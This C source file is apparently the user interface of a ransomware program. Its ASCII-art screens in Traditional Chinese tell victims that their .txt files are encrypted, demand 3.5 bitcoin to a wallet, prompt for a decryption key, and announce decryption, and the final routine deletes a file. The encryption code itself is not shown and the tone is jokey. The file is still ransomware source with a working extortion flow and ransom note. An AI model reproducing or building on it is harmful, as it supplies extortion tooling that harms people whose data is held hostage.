void home(void){
    printf("          *                    *                                                    \n");
    printf("         * *                  * *                                                   \n");
    printf("        *   *                *   *                                                  \n");
    printf("       *     *              *     *                                                 \n");
    printf("      *       *            *       *                                                \n");
    printf("     *         *          *         *                                               \n");
    printf("    *           **********           *      你在此資料夾所有的檔案都被我加密了，\n");
    printf("   *    ****                   ****   *     如果想要回你的檔案，就按照我說的做。        \n");
    printf("  *       ********       ********      *                                            \n");
    printf(" *          *******************         *                                           \n");
    printf("*            *****      *****            *                                          \n");
    printf("*         *   ***    *   ***     *        *                                         \n");
    printf(" *          *       ***       *           *                                         \n");
    printf("  *           *      *      *            *                                          \n");
    printf("   *   *  *  *               *  *  *    *                                           \n");
    printf("    *        *      * *     *          *                                            \n");
    printf("     *     *         *        *      *                                              \n");
    printf("      *   *                     *   *                                               \n");
    printf("     *                               *                                              \n");
    printf("    *                                 *                                             \n");
    printf("   *                                   *                                            \n");
    printf("  *                                     *                                           \n");
    printf(" *                                       *                                          \n");
    printf("*                                         *                                         \n");
    printf("*******************************************                                         \n");
    printf("____________________________________________________________________________________\n");
    printf("1>{我該怎麼辦} 2>你是誰 3>我有解密金鑰\n");
}

void home_1(void){
    system("cls");
    printf("          *                    *                                                    \n");
    printf("         * *                  * *                                                   \n");
    printf("        *   *                *   *                                                  \n");
    printf("       *     *              *     *                                                 \n");
    printf("      *       *            *       *                                                \n");
    printf("     *         *          *         *                                               \n");
    printf("    *           **********           *      你在此資料夾所有txt附檔名的檔案都被我加密了，\n");
    printf("   *    ****                   ****   *     如果想要回你的檔案，就按照我說的做。        \n");
    printf("  *       ********       ********      *                                            \n");
    printf(" *          *******************         *                                           \n");
    printf("*            *****      *****            *                                          \n");
    printf("*         *   ***    *   ***     *        *                                         \n");
    printf(" *          *       ***       *           *                                         \n");
    printf("  *           *      *      *            *                                          \n");
    printf("   *   *  *  *               *  *  *    *                                           \n");
    printf("    *        *      * *     *          *                                            \n");
    printf("     *     *         *        *      *                                              \n");
    printf("      *   *                     *   *                                               \n");
    printf("     *                               *                                              \n");
    printf("    *                                 *                                             \n");
    printf("   *                                   *                                            \n");
    printf("  *                                     *                                           \n");
    printf(" *                                       *                                          \n");
    printf("*                                         *                                         \n");
    printf("*******************************************                                         \n");
    printf("____________________________________________________________________________________\n");
    printf("1>{我該怎麼辦} 2>你是誰 3>我有解密金鑰\n");
}

void home_2(void){
    system("cls");
    printf("          *                    *                                                    \n");
    printf("         * *                  * *                                                   \n");
    printf("        *   *                *   *                                                  \n");
    printf("       *     *              *     *                                                 \n");
    printf("      *       *            *       *                                                \n");
    printf("     *         *          *         *                                               \n");
    printf("    *           **********           *      你在此資料夾所有txt附檔名的檔案都被我加密了，\n");
    printf("   *    ****                   ****   *     如果想要回你的檔案，就按照我說的做。        \n");
    printf("  *       ********       ********      *                                            \n");
    printf(" *          *******************         *                                           \n");
    printf("*            *****      *****            *                                          \n");
    printf("*         *   ***    *   ***     *        *                                         \n");
    printf(" *          *       ***       *           *                                         \n");
    printf("  *           *      *      *            *                                          \n");
    printf("   *   *  *  *               *  *  *    *                                           \n");
    printf("    *        *      * *     *          *                                            \n");
    printf("     *     *         *        *      *                                              \n");
    printf("      *   *                     *   *                                               \n");
    printf("     *                               *                                              \n");
    printf("    *                                 *                                             \n");
    printf("   *                                   *                                            \n");
    printf("  *                                     *                                           \n");
    printf(" *                                       *                                          \n");
    printf("*                                         *                                         \n");
    printf("*******************************************                                         \n");
    printf("____________________________________________________________________________________\n");
    printf("1>我該怎麼辦 2>{你是誰} 3>我有解密金鑰\n");
}

void home_3(void){
    system("cls");
    printf("          *                    *                                                    \n");
    printf("         * *                  * *                                                   \n");
    printf("        *   *                *   *                                                  \n");
    printf("       *     *              *     *                                                 \n");
    printf("      *       *            *       *                                                \n");
    printf("     *         *          *         *                                               \n");
    printf("    *           **********           *      你在此資料夾所有txt附檔名的檔案都被我加密了，\n");
    printf("   *    ****                   ****   *     如果想要回你的檔案，就按照我說的做。        \n");
    printf("  *       ********       ********      *                                            \n");
    printf(" *          *******************         *                                           \n");
    printf("*            *****      *****            *                                          \n");
    printf("*         *   ***    *   ***     *        *                                         \n");
    printf(" *          *       ***       *           *                                         \n");
    printf("  *           *      *      *            *                                          \n");
    printf("   *   *  *  *               *  *  *    *                                           \n");
    printf("    *        *      * *     *          *                                            \n");
    printf("     *     *         *        *      *                                              \n");
    printf("      *   *                     *   *                                               \n");
    printf("     *                               *                                              \n");
    printf("    *                                 *                                             \n");
    printf("   *                                   *                                            \n");
    printf("  *                                     *                                           \n");
    printf(" *                                       *                                          \n");
    printf("*                                         *                                         \n");
    printf("*******************************************                                         \n");
    printf("____________________________________________________________________________________\n");
    printf("1>我該怎麼辦 2>你是誰 3>{我有解密金鑰}\n");
}

void ui_1(void){
system("cls");
    printf("          *                    *                                                    \n");
    printf("         * *                  * *                                                   \n");
    printf("        *   *                *   *                                                  \n");
    printf("       *     *              *     *                                                 \n");
    printf("      *       *            *       *                                                \n");
    printf("     *         *          *         *                                               \n");
    printf("    *           **********           *                                              \n");
    printf("   *    ****                   ****   *     請將3.5枚比特幣匯入這個虛擬錢包內:         \n");
    printf("  *       ********       ********      *        {WTF52695269GG11TAVNO1}             \n");
    printf(" *          *******************         *                                           \n");
    printf("*            *****      *****            *                                          \n");
    printf("*         *   ***    *   ***     *        *                                         \n");
    printf(" *          *       ***       *           *                                         \n");
    printf("  *           *      *      *            *                                          \n");
    printf("   *   *  *  *               *  *  *    *                                           \n");
    printf("    *        *      * *     *          *                                            \n");
    printf("     *     *         *        *      *                                              \n");
    printf("      *   *                     *   *                                               \n");
    printf("     *                               *                                              \n");
    printf("    *                                 *                                             \n");
    printf("   *                                   *                                            \n");
    printf("  *                                     *                                           \n");
    printf(" *                                       *                                          \n");
    printf("*                                         *                                         \n");
    printf("*******************************************                                         \n");
    printf("____________________________________________________________________________________\n");
    printf("1>{我該怎麼辦} 2>你是誰 3>我有解密金鑰\n");
}

void ui_2(void){
    system("cls");
    printf("          *                    *                                                    \n");
    printf("         * *                  * *                                                   \n");
    printf("        *   *                *   *                                                  \n");
    printf("       *     *              *     *                                                 \n");
    printf("      *       *            *       *                                                \n");
    printf("     *         *          *         *                                               \n");
    printf("    *           **********           *        我是生活在黑黑的網路裏的一名駭客，        \n");
    printf("   *    ****                   ****   *       最近我想買PS5，                         \n");
    printf("  *       ********       ********      *      但手頭有點緊，                          \n");
    printf(" *          *******************         *     所以想跟你要一點錢。                     \n");
    printf("*         *   ***    *   ***     *        *                                         \n");
    printf(" *          *       ***       *           *                                         \n");
    printf("  *           *      *      *            *                                          \n");
    printf("   *   *  *  *               *  *  *    *                                           \n");
    printf("    *        *      * *     *          *                                            \n");
    printf("     *     *         *        *      *                                              \n");
    printf("      *   *                     *   *                                               \n");
    printf("     *                               *                                              \n");
    printf("    *                                 *                                             \n");
    printf("   *                                   *                                            \n");
    printf("  *                                     *                                           \n");
    printf(" *                                       *                                          \n");
    printf("*                                         *                                         \n");
    printf("*******************************************                                         \n");
    printf("____________________________________________________________________________________\n");
    printf("1>我該怎麼辦 2>{你是誰} 3>我有解密金鑰\n");
}

void ui_3(void){
    system("cls");
    printf("          *                    *                                                    \n");
    printf("         * *                  * *                                                   \n");
    printf("        *   *                *   *                                                  \n");
    printf("       *     *              *     *                                                 \n");
    printf("      *       *            *       *                                                \n");
    printf("     *         *          *         *                                               \n");
    printf("    *           **********           *                                              \n");
    printf("   *    ****                   ****   *                                             \n");
    printf("  *       ********       ********      *                                            \n");
    printf(" *          *******************         *                                           \n");
    printf("*            *****      *****            *                                          \n");
    printf("*         *   ***    *   ***     *        *                                         \n");
    printf(" *          *       ***       *           *                                         \n");
    printf("  *           *      *      *            *                                          \n");
    printf("   *   *  *  *               *  *  *    *                                           \n");
    printf("    *        *      * *     *          *                                            \n");
    printf("     *     *         *        *      *                                              \n");
    printf("      *   *                     *   *                                               \n");
    printf("     *                               *                                              \n");
    printf("    *                                 *                                             \n");
    printf("   *                                   *                                            \n");
    printf("  *                                     *                                           \n");
    printf(" *                                       *                                          \n");
    printf("*                                         *                                         \n");
    printf("*******************************************                                         \n");
    printf("____________________________________________________________________________________\n");
    printf("請輸入你的解密金鑰: ");
}

void key_true(void){
    printf("          *                    *                                                    \n");
    printf("         * *                  * *                                                   \n");
    printf("        *   *                *   *                                                  \n");
    printf("       *     *              *     *                                                 \n");
    printf("      *       *            *       *                                                \n");
    printf("     *         *          *         *        你的密鑰正確感謝你的贊助^_^ ^_^           \n");
    printf("    *           **********           *                                              \n");
    printf("   *    ****                   ****   *                                             \n");
    printf("  *       ********       ********      *                                            \n");
    printf(" *          *******************         *                                           \n");
    printf("*            *****      *****            *                                          \n");
    printf("*         *   ***    *   ***     *        *                                         \n");
    printf(" *          *       ***       *           *                                         \n");
    printf("  *           *      *      *            *                                          \n");
    printf("   *   *  *  *               *  *  *    *                                           \n");
    printf("    *        *      * *     *          *                                            \n");
    printf("     *     *         *        *      *                                              \n");
    printf("      *   *                     *   *                                               \n");
    printf("     *                               *                                              \n");
    printf("    *                                 *                                             \n");
    printf("   *                                   *                                            \n");
    printf("  *                                     *                                           \n");
    printf(" *                                       *                                          \n");
    printf("*                                         *                                         \n");
    printf("*******************************************                                         \n");
    printf("____________________________________________________________________________________\n");
}

void key_false(void){
    system("cls");
    printf("          *                    *                                                    \n");
    printf("         * *                  * *                                                   \n");
    printf("        *   *                *   *                                                  \n");
    printf("       *     *              *     *                                                 \n");
    printf("      *       *            *       *                                                \n");
    printf("     *         *          *         *                                               \n");
    printf("    *           **********           *       你的密鑰不正確                          \n");
    printf("   *                                  *         你的密鑰不正確                        \n");
    printf("  *       *******        *******       *           你的密鑰不正確                    \n");
    printf(" *           *              *           *              你的密鑰不正確                 \n");
    printf("*            *              *            *                  你的密鑰不正確           \n");
    printf("*         *          *           *        *                     你的密鑰不正確         \n");
    printf(" *          *       ***       *           *                                         \n");
    printf("  *           *      *      *            *                                          \n");
    printf("   *   *  *  *    *      *   *  *  *    *                                           \n");
    printf("    *        *     *    *   *          *                                            \n");
    printf("     *     *       *    *     *      *                                              \n");
    printf("      *   *       *      *      *   *                                               \n");
    printf("     *                               *                                              \n");
    printf("    *                                 *                                             \n");
    printf("   *                                   *                                            \n");
    printf("  *                                     *                                           \n");
    printf(" *                                       *                                          \n");
    printf("*                                         *                                         \n");
    printf("*******************************************                                         \n");
    printf("____________________________________________________________________________________\n");
}

int complete(void){
    system("cls");
    printf("          *                    *                                                    \n");
    printf("         * *                  * *                                                   \n");
    printf("        *   *                *   *                                                  \n");
    printf("       *     *              *     *                                                 \n");
    printf("      *       *            *       *                                                \n");
    printf("     *         *          *         *        資料已解密完畢!!                         \n");
    printf("    *           **********           *                                              \n");
    printf("   *    ****                   ****   *                                             \n");
    printf("  *       ********       ********      *                                            \n");
    printf(" *          *******************         *                                           \n");
    printf("*            *****      *****            *                                          \n");
    printf("*         *   ***    *   ***     *        *                                         \n");
    printf(" *          *       ***       *           *                                         \n");
    printf("  *           *      *      *            *                                          \n");
    printf("   *   *  *  *               *  *  *    *                                           \n");
    printf("    *        *      * *     *          *                                            \n");
    printf("     *     *         *        *      *                                              \n");
    printf("      *   *                     *   *                                               \n");
    printf("     *                               *                                              \n");
    printf("    *                                 *                                             \n");
    printf("   *                                   *                                            \n");
    printf("  *                                     *                                           \n");
    printf(" *                                       *                                          \n");
    printf("*                                         *                                         \n");
    printf("*******************************************                                         \n");
    printf("____________________________________________________________________________________\n");
    remove("encryption_file_name.txt");
    system("pause");
}
